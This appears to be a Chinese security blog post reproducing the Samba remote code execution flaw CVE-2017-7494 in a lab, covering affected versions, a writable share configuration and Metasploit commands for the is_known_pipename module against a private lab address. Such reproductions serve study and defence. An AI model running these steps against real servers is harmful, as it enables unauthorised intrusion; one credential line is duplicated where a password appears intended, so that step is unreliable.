天道酬勤

Samba远程代码执行漏洞(CVE-2017-7494)

Samba远程代码执行漏洞(CVE-2017-7494)

一、漏洞描述

2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞,漏洞编号CVE-2017-7494,漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。

二、影响版本

Samba 3.5.0到4.6.4/4.5.10/4.4.14的中间版本。

三、利用条件

1、服务开启了文件/打印机共享端口445。

2、共享文件具有写入权限。

3、攻击者需要知道共享目录的物理路径。

四、环境搭建

使用镜像: ubuntu-14.04.1-server-amd64.iso

在搭建的过程中,会询问我们安装什么软件,一定要记住勾选samba服务。

就是上面这个位置,一定要注意,空格是选择,tab是选择continue,然后回车是继续。然后耐心等待安装就行,安装教程附一篇:VMware下Ubuntu Server 14.04安装教程(最详细) – 简书

五、漏洞复现

1、匿名

(1)查看Samba版本

使用命令查看Samba的版本:

/usr/sbin/samba -V

版本号4.1.6,属于漏洞版本范围,所以存在漏洞。

(2)创建并配置共享目录

首先在/home目录下创建一个共享目录,并赋予最高权限。

(3)修改Samba的配置文件

/etc/samba/smb.conf下修改:

[myshare]
   comment=smb share test
   browseable=yes #可读
   writeable=yes #可写
   path=/home/share  #设置共享目录
   public = yes #允许匿名登录

使vim中显示左侧的行数::set number

之后我们重启smb服务:

service smbd start #开启
service smbd stop #关闭
service smbd restart #重启

(4)漏洞测试

开启Msf,寻找并利用exp。

search CVE-2017-7494

设置exp:

msf5 exploit(linux/samba/is_known_pipename) > set rhosts 192.168.203.138
rhosts => 192.168.203.138
msf5 exploit(linux/samba/is_known_pipename) > set SMB_FOLDER /home/share
SMB_FOLDER => /home/share
msf5 exploit(linux/samba/is_known_pipename) > set SMB_SHARE_NAME /home/share
SMB_SHARE_NAME => /home/share

最终攻击成功!

2、非匿名

修改配置文件:

vim /etc/samba/smb.conf

不允许匿名登录:设置public=no

在全局设置中,配置一个安全用户:

之后添加一个账户:

useradd user
smbpasswd -a user #设置用户user的smb密码
service smbd restart

这次我们在设置exp的时候就要加上账号和密码了

set smbuser user
set smbuser user

漏洞攻击成功。

参考文章:https://www.cnblogs.com/Hi-blog/p/7782356.html

 

赞(1) 打赏
未经允许不得转载:HackerGu‘s Blog » Samba远程代码执行漏洞(CVE-2017-7494)
分享到: 更多 (0)

评论 抢沙发

评论前必须登录!

 

专注黑客技术的研究

联系我们联系我们

觉得文章有用就打赏一下文章作者

微信扫一扫打赏